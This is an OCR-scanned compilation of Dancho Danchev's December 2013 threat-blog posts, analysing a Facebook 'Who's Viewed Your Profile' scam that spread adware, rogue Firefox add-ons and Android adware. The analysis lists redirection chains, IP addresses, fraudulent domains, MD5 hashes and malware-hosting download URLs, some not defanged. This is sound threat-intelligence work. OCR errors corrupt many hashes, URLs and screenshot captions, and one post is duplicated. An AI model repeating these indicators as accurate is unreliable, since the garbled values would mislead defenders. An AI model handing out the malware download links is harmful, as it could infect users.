4. hepa: //uvivastotal on/en/file/o762Be6a112828:Se6 167adS cHcda87 0119401 3c485ad86b4d5068ib0a07#6/analy 
is/ 
5. https: //www.virustotal. com/en/file/52dfd24ce2af 44c37 £5 cb8cd7 ed37bc0c62bf£5148293b89 1ccSef 558idc5369/analys 


is/ 


6. http: //www.webroot .com/blog/2013/01/22/android-malware-spreads-through-compromised-legitimate-web-sites/ 
7. http: //ddanchev. blogspot .com/2013/09/rogue-iframe-injected-web-sites-lead-to.htm 


4886 


9.12 December 


9.12.1 Summarizing Webroot’s Threat Blog Posts for November (2013-12-03 23:38) 


Webroot Threat Blog 
Internet Security Threat Updates & Insights 


WATCH CONNECT DISCUSS 
zr fe; © 2?) 


Cybercrime-friendly VPN service provider pitches itself as 


Search being ‘recommended by Edward Snowden’ 


December 3rd, 2013 by Dancho Danchev 


Our Extended Community 
Heise’ 
hilo peasleing an taoate niet oometcns Te eebtaad 


the currem trends in this ever-green market segment within the cybercrime ecosystem 


Nathan Collier : 
Posted in’ Threat Research 


Tagged Anonymity cybercrime EdwardSnowden fraud Fraudulent maikious Proms Proxy 
Russian security Socks4 SocksS SteppingStome SteppingStones VPN 


o 
w@ Dancho Danchev 


Russia 
} Grayson Miourne 


a 
“ Tyler Momnat 


ible Fake ‘October's Billing Address Code’ (BAC) form themed 
Leching For Suen? spam campaign leads to malware 


The Webroot Community is 
happy to answe' r 


November 27th, 2013 by Dancho Danchev 


qu ions, but ¢ you're looking Have you received a casual-sounding email enticing you into signing a Billing Address Code (BAC) form for October 
for our officsal Support . 


n Ore 


Manager to proceed with the transaction? Based on our statist 
department, please open a 


= ee receiv 
Suppon case 


cS, tens of thousands of users 


pam emails over the last 24 hours, with the 


m Clearly interested 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for November, 
2013. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


01. [3]Google-dorks based mass Web site hacking/SQL injecting tool helps facilitate malicious 
online activity 

02. [4]Deceptive ads lead to the SpyAlertApp PUA (Potentially Unwanted Application) 

03. [5]Cybercriminals differentiate their ‘access to compromised PCs’ service proposition, 
emphasize on the prevalence of ‘female bot slaves’ 

04. [6]New vendor of ‘professional DDoS for hire service’ spotted in the wild 

05. [7]Source code for proprietary spam bot offered for sale, acts as force multiplier for 
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cybercrime-friendly activity 

06. [8]Low Quality Assurance (QA) iframe campaign linked to May’s Indian government Web 
site compromise spotted in the wild 

07. [9]Popular French torrent portal tricks users into installing the Bubble- 
Dock/Downware/DownloadWare PUA (Potentially Unwanted Application) 

08. [10]Web site of Brazilian ‘Prefeitura Municipal de Jaqueira’ compromised, leads to fake 
Adobe Flash player 

09. [11]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a 
cocktail of client-side exploits 

10. [12]Vendor of TDoS products/services releases new multi-threaded SIP-based TDoS tool 
11. [13]Cybercriminals spamvertise tens of thousands of fake ‘Sent from my iPhone’ themed 
emails, expose users to malware 

12. [14]Fake ‘Annual Form (STD-261) - Authorization to Use Privately Owned Vehicle on State 
Business’ themed emails lead to malware 

13. [15]‘Newly released proxy-supporting Origin brute-forcing tools targets users with weak 
passwords’ 

14, [16]Fake WhatsApp ‘Voice Message Notification’ themed emails expose users to malware 
15. [17]Cybercriminals impersonate HSBC through fake ‘payment e-Advice’ themed emails, 
expose users to malware 

16. [18]Fake ‘MMS Gallery’ notifications impersonate T-Mobile U.K, expose users to malware 
17. [19]Fake ‘October’s Billing Address Code’ (BAC) form themed spam campaign leads to 
malware 


This post has been reproduced from [20]Dancho Danchev’s blog . Follow him 
[21]on Twitter. 


1. http://www .webroot .com/blog 


9. http://www. webroot .com/blog/2013/11/11/popular-french-torrent-portal-tricks-users-into/ 


10. ttp://www.webroot .com/blog/2013/11/12/web-site-brazilian-prefeitura-municipal-de- jaqueira-compromised- 


leads-fake-adobe-flash-player/ 


11. http://www.webroot .com/blog/2013/11/13/malicious-multi-hop-iframe-campaign-affects-—thousands-of-web-sit 
es-leads-to-cve-2011-3402/ 
12. http://www.webroot.com/blog/2013/11/15/vendor-tdos-productsservices-releases-new-multi-threaded-sip-bas 


ed-tdos-tool/ 


13. ttp://www.webroot.com/blog/2013/11/19/cybercriminals-spamvertise-tens-thousands-fake-sent-iphone-theme 


d-emails-expose-users-malware/ 


14. http://www.webroot.com/blog/2013/11/20/fake-annual-form-std-261-authorization-use-privately-owned-vehic 


le-state-business-themed-emails-lead-malware/ 


15. hbhttp://www.webroot.com/blog/2013/11/21/newly-released-proxy-supporting-origin-brute-forcing-tools-targe 


ts-users-weak-passwords/ 

16. http://www.webroot .com/blog/2013/11/22/fake-whatsapp-voice-message-notification-themed-emails-expose-us 
ers-malware/ 

17. bttp://www.webroot.com/blog/2013/11/25/cybercriminals- impersonate-hsbc-fake-payment-e-advice-themed-ema 
ils-expose-users-malware/ 

18. http://www.webroot .com/blog/2013/11/26/fake-mms-gallery-notifications-impersonate-t-mobile-u-k-expose-u 
sers-malware/ 

19. http://www.webroot .com/blog/2013/11/27/fake-octobers-billing-address-code-bac-form-themed-spam- campaign 
-leads-malware/ 

20. http://ddanchev.blogspot.com/ 

21. http://twitter.com/danchodanchev 


9.12.2 Facebook Circulating ’Who’s Viewed Your Profile’ Campaign Exposes 800k+ 
Users to CrossRider PUA/Rogue Firefox Add-ons/Android Adware AirPush 
(2013-12-04 02:25) 


Ever wanted to know who Is viewing your profite or who has viewed it while you 
were offfine? Now you can! 

Just cick the “Start Now" button below to fied out! 

“Only work on Chrome and Firefox! 


‘ I Am: oom 


Ina Relytorch O Snge 


A massive privacy-violating, Facebook circulating "Who's Viewed Your Profile" campaign, has 
been operating beneath the radar, exposing over 800,000 users internationally, to a cocktail 
of [1]PUAs (Potentially Unwanted Applications), rogue Firefox Add-ons impersonating Adobe’s 
Flash Player, as well as the Android based adware AirPush. 


Relying on a proven social engineering tactic of "offering what’s not being offered in 
general", next to hosting the rogue files on legitimate service providers - Google Docs and 
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Dropbox in this particular case - the campaign is a great example that the ubiquitous for the 
social network social engineering scheme, continues to trick gullible and uninformed users 
into installing privacy-violating applications on their hosts/mobile devices. 


Let’s dissect the campaign, expose its infrastructure, (conservatively) assess the dam- 
age, and provide fresh MD5s for the currently served privacy-violating PUAs, Firefox add-ons, 
and Android adware. 


Primary spamvertised Facebook URL: FCOSYUC.tk/?15796422 

Redirection chain: p2rof3rviewer9890.co.nf -> bit.ly/1bZCeNv?vsdvc -> 
whOprof.uni.me/?sdvsjka -> whOprof.uni.me/ch/ 

Rogue Google Store Extension URL (currently offline): hxxps://chrome.google.com/webstore/detai- 
I/dilaajjfgpigkebImlbamflggfjk gbej 

Campaign’s GA Account ID: UA-12798017-1 


[ ]-—— 


My profile has been viewed today 1908 times. 
Top 5 Visitors: 


1- - 123 visits 

2- te - 64 visits 

3- va - 44 visits 

4- 31 visits 

5- va EE] 6 visits 

See who has viewed your profile HERE: 
http://FCOSYUC.tk/?15796422 — with{=_——_ and 49 others 


Domain name reconnaissance: 
whOprof.uni.me - 192.157.201.42 


Known to have responded to the same IP are also the following domains: 
cracks4free.info 
pr0lotra.p9.org 


Google Docs Hosted PUA URLs: 

hxxps://docs.google.com/uc?authuser=0 &id=O0BziH-mKCuQwqVFIjUDBnTjFHdVE &ex- 
port=download 

hxxps://docs.google.com/uc?authuser=0 S&id=OBziH-mKCuQwqRXBMLWZ4cVZJV2s &ex- 
port=download 

hxxps://docs.google.com/uc?authuser=0 &id=O0BziH-mKCuQwqUj/ILWc4MVFRQUk &ex- 
port=download 

hxxps://docs.google.com/uc?authuser=0 &id=OBziH-mKCuQwqOXlyNkoOVFBOdnM = &ex- 
port=download 
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hxxps://docs.google.com/uc?authuser=0 &id=0BziH-mKCuQwqZm5yeUFudFhqclU &ex- 
port=download 
hxxps://docs.google.com/uc?authuser=0 &id=OBziH-mKCuQwqbWpfNW5FalJ/mRGM = &ex- 
port=download 
hxxps://docs.google.com/uc?authuser=0 &id=O0BziH-mKCuQwgqgS3V1ZkZBQj/GbjQ &ex- 
port=download 
hxxps://docs.google.com/uc?authuser=0 &id=OBziH-mKCuQwqX2xXbEJLbEY0Q3M &eX- 
port=download 
hxxps://docs.google.com/uc?authuser=0 &id=OBziH-mKCUuQWqMU5RVkJSWURXMEO  &ex- 
port=download 
hxxps://docs.google.com/uc?authuser=0 &id=O0BziH-mKCuQwqVFIjUDBnTj/FHAVE &eX- 
port=download 


Dropbox Firefox Add-on/Android APK Hosted URLs: 


hxxps://dl.dropboxusercontent.com/s/so3vm50w298qkto/WhoViewsYourProfil e.apk 
hxxps://dl.dropboxusercontent.com/s/kor9c2mqv4 9esva/kkadobe-ff. xpi 


Software Installation | ss’ . ss” | sé 


1 Install add-ons only from authors whom you trust. 


Malicious software can damage your computer or violate your privacy. 


You have asked to install the following item: 


Adobe Flash Player (Author not verified) 
https://dl.dropboxusercontent.com/s/kor9c2mqv49esva/kkadobe-ff.xpi 


Detection rate for the served PUAs, the Android adware and the rogue Firefox Add-on: 
[2]MD5: c7fcf7078597ea752b8d54e406c266a7 - detected by 5 out of 48 antivirus scanners 
as PUP.Optional.CrossRider 

[3]MD5: 30cf98d7dc97cae57f8d72487966d20b - detected by 6 out of 48 antivirus scanners 
as Trojan.Dropper.FB 

[4]MD5: f2459b6bde1d662399a3df725bf8891b - detected by 13 out of 48 antivirus scanners 
as Adware/AirPush!Android; Android Airpush; Adware/ANDR.Airpush.G.Gen 

[5]MD5: 3fb95el1ed77d1b545cf7385b4521b9ae - detected by 18 out of 48 antivirus scanners 
as JS/TrojanClicker.Agent.NDL 


Once executed MD5: 30cf98d7dc97cae57f8d72487966d20b phones back to 195.167.11.4. 
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Time to (conservatively) assess the campaign’s damage over the year(s): 


: 
a 

> 

iil 


History — (40) & 


- : 
— Max = Avg — Min ] 


2,798 


2012 


+ Data, 


History — (41) & zen) 30d {rm 365) | Q) 2) 3 
acpi, + 


\— Mex — Avg — Min | 


632 


Jun jul Aue 
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History —- (42) & 24h 30d 12m 365 QB 
gets + 


( — max — Avg — nin | 
sad en. Lt 


292 


17) 18 «19 «20 «213 «22 «230 «26 «6250 62606027 88 


1 Data) 


The click-through rate should be considered conservative, and it remains unknown whether 
the URL shortening service was used by the cybercriminal(s) since day one of the campaign. 


bitly Do more with your links, Learn More } Join now. It's free! | Sign in 


whoprof.uni.me/?sdvsjka 873,058 
http//whoprof.uni.me/?sdvsjka total clicks 

Global bitly link 
4) first created on Oct 17, 2013. bitly/ibZCeNv 


‘) Traffic to this link peaked at 71,433 clicks on Mon Dec 02 2013. 
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All time 


80,000 
- il rl l | | | 
p fl lal | —_—— | all 
Oct 21, 2013 Oct 26, 2013 Oct 31, 2013 Nov 5, 2013 Nov 10,2013 WNov15,2013 MNov20,2013 Nov25,2013 Nov 30,2013 


Geographic Distribution of Clicks 


Top Countries (clicks / % of total) 


India Mes 14.56) 19% 
United States — 12% 
Pakistan = 10% 
Indonesia me 61.998 7% 
Philippines = « 7% 
Lithuania a 2% 
Malaysia w x 2% 
United Kingdom a 00 2% 
Bulgaria 813.436 2% 


United Arab Emirat.. 1 10.628 1% 


The campaign remains active, and is just the tip of the iceberg in terms of similar campaigns 
tricking Facebook’s users into thinking that they can eventually see who’s viewed their profile. 
Facebook users who stumble across such campaigns on their own, or their friends’ Walls, are 
advised [6]to consider reporting the campaign back to Facebook, immediately. 


This post has been reproduced from [7]Dancho Danchev’s blog . Follow him 
[8Jon Twitter. 


1. http: //www.webroot .com/blog/tag/pua/ 


2. https: //www.virustotal.com/en/file/ecd6bb6e53477496ea45de362012b4b1d458ee966867eb89ea4005ch5bd9fe8b3/analys 
3. 
4. 


SS 
SS 


is/1386108420/ 

5. https://www.virustotal .com/en/file/3b25b67592b9b06f ca05ab6 1abd16559e7 c94f9ac3c225e5ae00ddc5318923c6/analys 
is/1386109278/ 

6. https://www.facebook.com/help/www/117257561692875 

7. http://ddanchev. blogspot .com/ 

8. http: //twitter .com/danchodanchev 


9.12.3 Facebook Circulating ’Who’s Viewed Your Profile’ Campaign Exposes 800k+ 


Users to CrossRider PUA/Rogue Firefox Add-ons/Android Adware AirPush 
(2013-12-04 02:25) 


Ever wanted to know who is wiewing your profite or who hus viewed it while you 
were offre? Now you can! 

Just cick the “Start Now” button below to find out! 

“Only work on Chrome and Firefox! 


% Lam: 


Ina Reutorch © Snge 


A massive privacy-violating, Facebook circulating "Who’s Viewed Your Profile" campaign, 
has been operating beneath the radar, exposing over 800,000 users internationally, to a 
cocktail of [1]PUAs (Potentially Unwanted Applications), rogue Firefox Add-ons impersonating 
Adobe’s Flash Player, as well as the Android based adware AirPush. 


Relying on a proven social engineering tactic of "offering what’s not being offered in 
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general", next to hosting the rogue files on legitimate service providers - Google Docs and 
Dropbox in this particular case - the campaign is a great example that the ubiquitous for the 
social network social engineering scheme, continues to trick gullible and uninformed users 
into installing privacy-violating applications on their hosts/mobile devices. 


Let’s dissect the campaign, expose its infrastructure, (conservatively) assess the dam- 
age, and provide fresh MD5s for the currently served privacy-violating PUAs, Firefox add-ons, 
and Android adware. 


Primary spamvertised Facebook URL: FCOSYUC.tk/?15796422 


Redirection chain: p2rof3rviewer9890.co.nf -> bit.ly/1bZCeNv?vsdvc -> 
whOprof.uni.me/?sdvsjka -> whOprof.uni.me/ch/ 


Rogue Google Store Extension URL (currently offline): hxxps://chrome.google.com/webstore/detai- 
I/dilaajjfgpigkebImlbamflggfjk gbej 


Campaign’s GA Account ID: UA-12798017-1 


[ j-—— 


My profile has been viewed today 1908 times. 
Top 5 Visitors: 


i- - 123 visits 

2- te - 64 visits 

ae va - 44 visits 

4- 31 visits 

5- ve Ey 6 visits 

See who has viewed your profile HERE: 
http://FCOSYUC.tk/?15796422 — with! and 49 others 
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Domain name reconnaissance: 


whOprof.uni.me - 192.157.201.42 


Known to have responded to the same IP are also the following domains: 


cracks4free.info 
pr0lotra.p9.org 


Google Docs Hosted PUA URLs: 


hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 


&id=O0BziH-mKCuQwqVFIjUDBnTj/FHAVE 
&id=O0BziH-mKCuQwqRXBMLWZ4cVZJV2s 
&id=O0BziH-mKCuQwqUjlILWc4MVFRQUk 
&id=O0BziH-mKCuQwqOxXlyNkoOVFBOdnM 
&id=0BziH-mKCuQwqZm5yeUFudFhqclU 
&id=0BziH-mKCuQwqbWpfNW5Fal/mRGM 
&id=OBziH-mKCuQwqS3V1ZkZBQiGbjQ 
&id=O0BziH-mKCuQwgqX2xXbEJLbEYO0Q3M 
&id=O0BziH-mKCuQwqMU5RVkJSWURXMEO 


&id=O0BziH-mKCuQwqVFIjUDBnTjFHdVE 


Dropbox Firefox Add-on/Android APK Hosted URLs: 


hxxps://dl.dropboxusercontent.com/s/so3vm50w298qkto/WhoViewsyYourProfil e.apk 
hxxps://dl.dropboxusercontent.com/s/kor9c2mqv49esva/kkadobe-ff. xpi 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 
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Software Installation g ~ ~ so” z sé 
1 Install add-ons only from authors whom you trust. 


Malicious software can damage your computer or violate your privacy. 


You have asked to install the following item: 


Adobe Flash Player (Author not verified) 
https://dl.dropboxusercontent.com/s/korPSc2maqv49esva/kkadobe-ff.xpi 


Detection rate for the served PUAs, the Android adware and the rogue Firefox Add-on: 


[2]MD5: c7fcf7078597ea752b8d54e406c266a7 - detected by 5 out of 48 antivirus scan- 
ners as PUP.Optional.CrossRider 


[3]MD5: 30cf98d7dc97cae57f8d72487966d20b - detected by 6 out of 48 antivirus scan- 
ners as Trojan.Dropper.FB 


[4]MD5: f2459b6bde1d662399a3df725bf8891b - detected by 13 out of 48 antivirus scanners 
as Adware/AirPush!Android; Android Airpush; Adware/ANDR.Airpush.G.Gen 


[5]MD5: 3fb95e1ed77d1b545cf7385b4521b9ae - detected by 18 out of 48 antivirus scanners 
as JS/TrojanClicker.Agent.NDL 


Once executed MD5: 30cf98d7dc97cae57f8d72487966d20b phones back to 195.167.11.4. 


Time to (conservatively) assess the campaign’s damage over the year(s): 
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History — (40) & 24h 30d 12m 365, QB Doe) =) ma 
mes iH t 


| — nex — Avg — Hin 


2,798 


1,309 


2011 2012 2013 now 


History —> (41) & 24h 30d 2m 365 | Q x = 
Report chis eccaunt c 


| — max — Avg — Min | 


632 
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History —_> (42) & 24h 30d 2) |ses) | Q 
al ges + 


292 


15 16 17 #18 19 20 223 #22 23 24 2S 26 


1 Data, 


The click-through rate should be considered conservative, and it remains unknown whether 
the URL shortening service was used by the cybercriminal(s) since day one of the campaign. 


bitly Do more with your links, Learn More 


Sign in 
whoprof.uni.me/?sdvsjka 873,058 
http//whoprof.uniL.me/?sdvsjka total clicks 

Global bitly link 
9) first created on Oct 17, 2013. bitlyAbZCeNv 


© Traffic to this link peaked at 71,433 clicks on Mon Dec 02 2013. 
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59,000 


~ alll ll i 
0 I ltl tun... al 


Oct21,2013 =Oct 26,2013 = Oct 31, 2013 Nov 5, 2013 Nov 10,2013 Nov 15,2013 Nov20,2013 Nov25,2013 Nov 30,2013 


Geographic Distribution of Clicks 


Top Countries (dicks / % of total) 


India ws 155) 19% 
United States Mums 105,741 n% 
Pakistan mms 88.434 10% 
Indonesia me 61.998 7% 
Philippines mmm 55.844 ™% 
Lithuania 8 19.026 2% 
Malaysia 8 15,606 2% 
United Kingdom 8 14.900 2% 
Bulgaria 8 13.436 2% 
United Arab Emirat. 1 10.628 1% 


+90 more 


The campaign remains active, and is just the tip of the iceberg in terms of similar cam- 
paigns tricking Facebook’s users into thinking that they can eventually see who’s viewed their 
profile. Facebook users who stumble across such campaigns on their own, or their friends’ 
Walls, are advised [6]to consider reporting the campaign back to Facebook, immediately. 
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1. http: //www.webroot .com/blog/tag/pua/ 
2. https://www.virustotal.com/en/file/ecd6bb6e53477496ea45de36201 2b4b1d458ee966867eb89ea4005c5bd9fe8b3/analys 
is/1385988722/ 


3. https://www.virustotal.com/en/file/b44aabb0e235d36377£3cd55ec4af596a89c0a7814103369d3f48d54d29ffcc7/analys 


is/1385988808/ 


4. https://www.virustotal.com/en/file/72f3834e9c8ee164b7e82383415da822579f fb23f bfa7 f55ac650a22b2386ee0/analys 


is/1386108420/ 


5. bhttps://www.virustotal.com/en/file/3b25b67592b9b06f ca05ab6 1abd16559e7c94f 9ac3c225e5ae00ddc5318923c6/analys 


is/1386109278/ 


6. https: //www.facebook. com/help/www/11725756169287 


9.12.4 Continuing Facebook "Who’s Viewed Your Profile" Campaign Affects Another 
190k+ Users, Exposes Malicious Cybercrime Ecosystem (2013-12-11 05:01) 


[ —_— 


My profile has been viewed today 998 times. 
Top 5 Visitors: 


1- a - 116 visits 
2- 64 visits 
3- 46 visits 

4- 34 visits 

a 8 visits 


See who has viewed your profile HERE: 


http://NXJXBMQ.tk/?12358289 ee 47 others 


Like * Comment 


Last week, immediately after | published the initial analysis detailing [1]a massive privacy- 
violating "Who’s Viewed Your Profile" campaign, that was circulating across Facebook, the 
cybercriminals behind it, supposedly took it offline, with one of the main redirectors now 
pointing to 127.0.0.1. 


Not surprisingly, the primary campaign has multiple sub-campaigns still in circulation, 
which based on the latest statistics - embedded within the campaign on the same day they 
supposedly shut it down - has already exposed another 190,000+ of the social network’s 
users - the original campaign appears to have been launched in 2011 having already exposed 
800,000+ users - to more rogue, privacy violating apps - JS.Febipos, Mindspark Interactive 
Network’s MylmageConverter and Trojan-Ransomer.CLE, in this particular case. 


Let’s dissect the still circulating campaign, expose the entire infrastructure supporting it, 
establish direct connections with it to related malicious campaigns, indicating that someone’s 
either multi-tasking, or that their malicious/fraudulent activities share the same infrastructure, 
provide MD5s for the currently served privacy-violating apps, as well as list the actual - 
currently live - hosting locations. 
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Ever wanted to know who is viewing your profile or who has viewed it while you 
were offline? Now you can! 

Just click the “Start Now" button below to find out! 

*Only work on Chrome and Firefox! 


@ | Am: Po 


t In 4 Relationship. Single 


Sample redirection chain: 

hxxp://NX|XBMQ.tk/?12358289 - 93.170.52.21; 93.170.52.33 
hxxp://p2r0f3rviewer9890.co.nf/?Sdk22222222222222222222222222222222222 
2222222222222222222222222222222222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 

222222222222 2222222222222 22222222222222222222222222222222222222222722 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 


-> 
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22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
222222222 22222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
22222222222222 
22222222222222222222222222222222222222222222222222222222222222222222 
2222222ajsklfjasl 

fkjasfklja -> hxxp://prostats.vfl.us - 192.157.201.42 -> hxxp://whoviewsfb.uni.me/ch/profile.html 
- 82.208.40.11 


Redirection chain domain name reconnaissance: 
NXJXBMQ.tk - 93.170.52.21; 93.170.52.33 
p2r0f3rviewer9890.co.nf - 83.125.22.192 
whoviewsfb.uni.me - 82.208.40.11 
prostats.vfl.us - 192.157.201.42 
whOstalks.uni.me - 192.157.201.42 
cracks4free.info - 192.157.201.42 


Known to have responded to 93.170.52.21 are also the following fraudulent domains: 
0.facebook.com.fpama.tk 
001200133184123129811.tk 
OOwwebhost.tk 
01203313441.tk 
Olprof86841.tk 
029m821t9fs.4ieiii.tk 
031601.tk 

0333.tk 

057 1baidu.tk 
O5pr0f1le21200.tk 
O5pr0file214741.tk 
O60uty80w.tk 

O06emu.tk 

0886.tk 

Oakleycityn.tk 

OaoOgrecu.tk 
Ofcf7.chantaljltaste.tk 
Olod1lmt1.tk 

Olove.tk 


The following malicious MD5s are also known to have phoned back to 93.170.52.21 in 
the past: 
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MD5: ee78fe57ad8dbac96b31f41f7 7eb5877 
MD5: bed006372fc76ec261dc9b223b178438 
MD5: 58f9cbec80d1dc3a5afbb7339d200e66 
MD5: fd0c6b284f7700d59199c55fdcd5bd8a 
MD5: 4bfeb3c882d816d37c3e6cbb749e44af 
MD5: 97ec866ac26e961976e050591f49fec3 
MD5: abal720b1a6747de5d5345b5893ba2f5 
MD5: de5e1f6f137ecb903a018976fc04e110 
MD5: a9669b65cabd6b25a32352ccf6c6c09a 
MD5: 003f4d9dafba9ee6e358b97b8026e354 
MD5: bab313e031b0c54d50fd82d221f7defc 
MD5: e6b766f627b91fd420bd93fab4bc323f 
MD5: d63656d9b051bf762203b0c4ac728231 
MD5: 935440d970ee5a6640418574f4569dab 
MD5: 2524e3b4ed3663f5650563c1e431b05c 
MD5: 726646a41f95b12ec26cfO1f1lc89cf9 
MD5: adaf6c04d28fcea476827437caf4c681 
MD5: c7346327f86298fa5dad160366a0cf26 
MD5: 912ed9ef063ae5b6b860fd34f3e8b83a 
MD5: b33aaa98ad706ced23d7c64aed0fcad6 


Known to have responded to 93.170.52.33 are also the following fraudulent domains: 


Olwwa.tk 

Omsms.tk 
122.72.0.7sierra-web-www.szjlc-pcb.tk 
1z8dz.tk 

4flwz8.ga 

777898.ga 

888234.ml 

8eld7.tk 

abmomre.tk 
accountupdateinformation.tk 
ahram-org-eg.tk 

alex-fotos.tk 

allycam.tk 

amerdz.ml 

angelsmov.tk 

apis-drives-google.tk 
apis-googledrive.tk 

apple-idss.tk 
appleid.apple.com.cgi-bin.myappleid.woa.apple-idss.tk 
avtoshina.tk 


The following malicious MD5s are also known to have phoned back to 93.170.52.33 in 


the past: 

MD5: 2d951e649a8bbcbfa468f7916e188f9F 
MD5: dbe2c0788e74916eba251194ef783452 
MD5: 4bfeb3c882d816d37c3e6cbb749e44af 
MD5: dc01c1db51e26b585678701a64c94437 
MD5: 61cc3de4e9a9865e0d239759ed3c7d5a 
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MD5: 64505b7calce3c1c0c4892abe8d86321 
MD5: 0698356395b2463ea0f339572b9c95ef 
MD5: 9e87c189d3cbf2fc2414934bef6e661b 

MD5: 48964a66bdc81b48f2fe7a31088c041b 
MD5: f81c85bea0e2251655b7112b352f302e 


The following MD5s are also known to have phoned back to 83.125.22.192 in the past: 
MD5: 3935b6efa7e5ee995f410f4efle613ab 

MD5: 64c1496el1ba2b7cb5c54a33c20be3e95 

MD5: 08f76a1ed5996d7dfdcf8226fe3f66b9 

MD5: f508d8034223c4ce233flbdbed265a3a 


Known to have responded to 82.208.40.11 are the following fraudulent domains: 
000e0062fb44cd5b277591349e070277.cz.cc 
003bc1b16c548efbc4f30790e0bc17be.cz.cc 
0057ab88a8febe310f94107137731424.cz.cc 
008447a58c242b52cb69fe7dceea9a0b.cz.cc 
00a47e5e5 7323f23c66f2c2d5bc1ldebc.cz.cc 
00a9a591d1e7aaf65639781bc73199d4.cz.cc 
00ad3353e0ba865a521da380ba4e0cc4.cz.cc 
00d55beb792962f7a04c66b85f2c6082.cz.cc 
00e3b9ece447187da3f43f98ab619a28.cz.cc 
00eb52dbc4331a64e4fd96fdca890d9c.cz.cc 
00f59cfa33cd097e943a38a8f2e343ee.czZ.cC 
OO0fbdb49398f0e5fd9d5572044d8934e.cz.cc 
010ab81241856dfca44dd9ade4489fbc.cz.cc 
011622fb7752328ebb60bd2c075flfe6.cz.cc 
O11fbf88cfflc18e05c2afb53d6e5ffd.cz.cc 
0133147433aeef23bbe60df0cbc4eac9.cz.cc 
013f98b7157ae3754d463e9d2346a549.cz.cc 
013fa3e9db6e476282b8e9flbac6d68e.cz.cc 
017c2bd33744c2d423a2a7598a0c0a4e.cz.cc 
019368b1f3b364c0d3ec412680638f04.cz.cc 


The following malicious MD5s are also known to have phoned back to 82.208.40.11 in 
the past: 

MD5: 2c89dfc1706b31ba7de1c14e229279e5 
MD5: 6719d3e8606d91734cde25b8dfc4156f 
MD5: 61dcea6fbf15b68be831bff8c5eb0c1d 
MD5: 3875fa91f060d02bddd43ff8e0046588 
MD5: 929b72813bae47f78125ec30c58f3165 
MD5: 96fa2ea6db2e4e9f00605032723e1777 
MD5: c46968386138739c81e219da6fb3ead5 
MD5: 3d627e0dbc5ac51761fa7cc7b202ec49 
MD5: d9714a0f7f881d3643125aa0461a30be 
MD5: 81171015a95073748994e463142ddcc7 


Known to have responded to 192.157.201.42 are also the following fraudulent domains: 
cracks4free.info 
prOlotra.p9.org 
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prostats.vfl.us 
whOprof.uni.me 
cracks4free.info 


Time to provide the actual, currently live, hosting locations for the served privacy-violating 
content. 


Who Viewed Your Profile 


\ More ways to experience Facebook 


_| News Feed 


Introducing thenew "Who |_.. 
Viewed Your Profile" feature pm ...... 
on facebook! 

Ever wanted to see how views your 
profile? 

on Facebook? Now you can! 

Let yourself do & already! 


It's Just an Extension to instal. facebook 
INSTALL 


Mindspark Interactive Network’s MylmageConverter served URL: 
hxxp://download.myimageconverter.com/index.jhtml?partner=*AZ 0*xdm081 


Google Store served URLs: 
hxxps://chrome.google.com/webstore/detail/miapmjacmjonmofofflhnbafpbmfapac - currently 
active 

hxxps://chrome.google.com/webstore/detail/dllaajjfgpigkebIlmlbamflggfjkgbej 


Dropbox Accounts serving the Android app (offline due to heavy usage), and the Fire- 
fox extension: 

hxxps://dl.dropboxusercontent.com/s/rueyn3o0wrrpsbw4/whoviews5.xpi - currently online 
hxxps://dl.dropboxusercontent.com/s/so3vm50w298qkto/WhoViewsYourProfile.apk 
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Error (509) 


This account's public links are generating too much traffic and have been temporarily 


disabled! 


Facebook App URL: 
hxxp://apps.facebook.com/dislike  _ 


Google Docs served privacy-violating apps: 


hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
port=download 
hxxps://docs.google.com/uc?authuser=0 
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_button/ 


&id =O0BziH-mKCuQwqVFIjUDBnTjFHAVE 
&id=O0BziH-mKCuQwgqRXBMLWZ4cVZJV2s 
&id=O0BziH-mKCuQwgOXlyNkoOVFBOdnM 
&id=O0BziH-mKCuQwqZm5yeUFudFhqclU 
&id=0BziH-mKCuQwqbWpfNW5FalJmRGM 
&id=0BziH-mKCuQwgS3V1ZkZBQjJGbjQ 
&id=O0BziH-mKCuQwqX2xXbEJLbEYO0Q3M 

&id=O0BziH-mKCuQwqMU5RVkJSWURXMEO 


&id=0BziH-mKCuQwqVFIjUDBnTjFHAVE 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


port=download 


GA Account IDs: UA-23441223-3; UA-12798017-1 
MylmageConverter Affiliate Network ID: ~AZO*xdm081 


Detection rate for the served apps/extensions: 

